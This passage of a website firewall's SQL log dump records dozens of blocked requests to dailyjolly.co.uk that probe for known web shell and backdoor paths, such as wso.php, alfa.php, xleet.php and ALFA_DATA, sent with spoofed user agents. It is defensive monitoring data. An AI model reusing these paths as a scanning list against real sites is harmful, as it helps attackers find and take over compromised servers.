User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2NjeC9pbmRleC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(12152,1674859294.553543,1674859294.425900,'\0\0\0\0\0\0\0\0\0\0��U�bM',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/ccx/index.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9jY3gvaW5kZXgucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12153,1674871720.519827,1674871720.392600,'\0\0\0\0\0\0\0\0\0\0��PL3',0,403,0,0,0,'https://dailyjolly.co.uk/wp-includes/wsoyanzorng.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3dzb3lhbnpvcm5nLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12154,1674871715.341184,1674871715.208800,'\0\0\0\0\0\0\0\0\0\0��PL3',0,403,0,0,0,'https://dailyjolly.co.uk/wp-includes/wsoyanzorng.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3dzb3lhbnpvcm5nLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12155,1674879606.117445,1674879605.966900,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk/templates/beez3/index.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3RlbXBsYXRlcy9iZWV6My9pbmRleC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(12156,1674879605.693637,1674879605.578600,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk/config.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2NvbmZpZy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(12157,1674879605.305343,1674879605.196300,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk/alfa.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2FsZmEucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12158,1674879605.015830,1674879604.907600,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12159,1674879604.665390,1674879604.511100,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk/test.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3Rlc3QucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12160,1674879604.254423,1674879604.144600,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk/a.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2EucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12161,1674879603.846632,1674879603.738400,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk/z.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3oucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12162,1674879603.427314,1674879603.316500,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk/x.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3gucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12163,1674879601.927795,1674879601.779000,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk/1.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"LzEucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12164,1674879601.595347,1674879601.452200,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk/upload.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3VwbG9hZC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(12165,1674879601.274224,1674879601.161500,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk/up.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3VwLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12166,1674879600.998668,1674879600.858800,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk/shell.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3NoZWxsLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12167,1674879600.685345,1674879600.565600,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk/wso.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dzby5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(12168,1674879600.400854,1674879600.252400,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk/xleet.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3hsZWV0LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12169,1674879600.087282,1674879599.977500,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk/olux.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L29sdXgucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12170,1674879599.735998,1674879599.624200,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk/shells.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3NoZWxscy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(12171,1674879599.346144,1674879599.224700,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk/about.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2Fib3V0LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12172,1674879598.947515,1674879598.828500,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk/index.php?3x=3x','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2luZGV4LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12173,1674879598.547052,1674879598.437200,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/ubh/up.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91YmgvdXAucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12174,1674879597.829768,1674879597.715600,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk/admin/controller/extension/extension/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2FkbWluL2NvbnRyb2xsZXIvZXh0ZW5zaW9uL2V4dGVuc2lvbi9jZ2lhbGZh\",\"category\":\"brute-force\",\"ssl\":1}'),(12175,1674879597.123366,1674879597.012100,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk/admin/controller/extension/extension/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2FkbWluL2NvbnRyb2xsZXIvZXh0ZW5zaW9uL2V4dGVuc2lvbi9hbGZhY2dpYXBp\",\"category\":\"brute-force\",\"ssl\":1}'),(12176,1674879596.418014,1674879596.307600,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk/admin/controller/extension/extension/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2FkbWluL2NvbnRyb2xsZXIvZXh0ZW5zaW9uL2V4dGVuc2lvbi9BTEZBX0RBVEE=\",\"category\":\"brute-force\",\"ssl\":1}'),(12177,1674879595.724068,1674879595.615500,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk/sites/default/files/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3NpdGVzL2RlZmF1bHQvZmlsZXMvY2dpYWxmYQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(12178,1674879594.849288,1674879594.735800,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk/sites/default/files/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3NpdGVzL2RlZmF1bHQvZmlsZXMvYWxmYWNnaWFwaQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(12179,1674879594.115521,1674879594.004500,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk/sites/default/files/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3NpdGVzL2RlZmF1bHQvZmlsZXMvQUxGQV9EQVRB\",\"category\":\"brute-force\",\"ssl\":1}'),(12180,1674879593.394161,1674879593.281500,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk/templates/beez3/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3RlbXBsYXRlcy9iZWV6My9jZ2lhbGZh\",\"category\":\"brute-force\",\"ssl\":1}'),(12181,1674879592.629447,1674879592.518700,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk/templates/beez3/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3RlbXBsYXRlcy9iZWV6My9hbGZhY2dpYXBp\",\"category\":\"brute-force\",\"ssl\":1}'),(12182,1674879591.911170,1674879591.769200,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk/templates/beez3/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3RlbXBsYXRlcy9iZWV6My9BTEZBX0RBVEE=\",\"category\":\"brute-force\",\"ssl\":1}'),(12183,1674879591.207097,1674879591.089100,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvY2dpYWxmYQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(12184,1674879590.531213,1674879590.420400,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvYWxmYWNnaWFwaQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(12185,1674879589.829716,1674879589.717900,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvQUxGQV9EQVRB\",\"category\":\"brute-force\",\"ssl\":1}'),(12186,1674879589.098355,1674879588.985900,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWFkbWluL2NnaWFsZmE=\",\"category\":\"brute-force\",\"ssl\":1}'),(12187,1674879588.384607,1674879588.257700,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWFkbWluL2FsZmFjZ2lhcGk=\",\"category\":\"brute-force\",\"ssl\":1}'),(12188,1674879587.654920,1674879587.546200,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWFkbWluL0FMRkFfREFUQQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(12189,1674879586.981853,1674879586.875300,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-includes/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWluY2x1ZGVzL2NnaWFsZmE=\",\"category\":\"brute-force\",\"ssl\":1}'),(12190,1674879586.314403,1674879586.208300,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-includes/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWluY2x1ZGVzL2FsZmFjZ2lhcGk=\",\"category\":\"brute-force\",\"ssl\":1}'),(12191,1674879585.331628,1674879585.223100,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-includes/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWluY2x1ZGVzL0FMRkFfREFUQQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(12192,1674879584.637375,1674879584.530600,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/uploads/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvdXBsb2Fkcy9jZ2lhbGZh\",\"category\":\"brute-force\",\"ssl\":1}'),(12193,1674879583.919198,1674879583.809900,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/uploads/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvdXBsb2Fkcy9hbGZhY2dpYXBp\",\"category\":\"brute-force\",\"ssl\":1}'),(12194,1674879583.247420,1674879583.122700,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/uploads/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvdXBsb2Fkcy9BTEZBX0RBVEE=\",\"category\":\"brute-force\",\"ssl\":1}'),(12195,1674879582.578133,1674879582.460900,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk/.well-known/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"Ly53ZWxsLWtub3duL2NnaWFsZmE=\",\"category\":\"brute-force\",\"ssl\":1}'),(12196,1674879581.230760,1674879581.123700,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk/.well-known/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"Ly53ZWxsLWtub3duL2FsZmFjZ2lhcGk=\",\"category\":\"brute-force\",\"ssl\":1}'),(12197,1674879580.545558,1674879580.429200,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk/.well-known/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"Ly53ZWxsLWtub3duL0FMRkFfREFUQQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(12198,1674879579.829321,1674879579.713600,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2NnaWFsZmE=\",\"category\":\"brute-force\",\"ssl\":1}'),(12199,1674879579.095142,1674879578.979800,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2FsZmFjZ2lhcGk=\",\"category\":\"brute-force\",\"ssl\":1}'),(12200,1674879578.400658,1674879578.293100,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L0FMRkFfREFUQQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(12201,1674879577.690039,1674879577.579600,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk/error.php?phpshells=','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2Vycm9yLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12202,1674879576.915030,1674879576.805600,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-backup-sql-302.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious 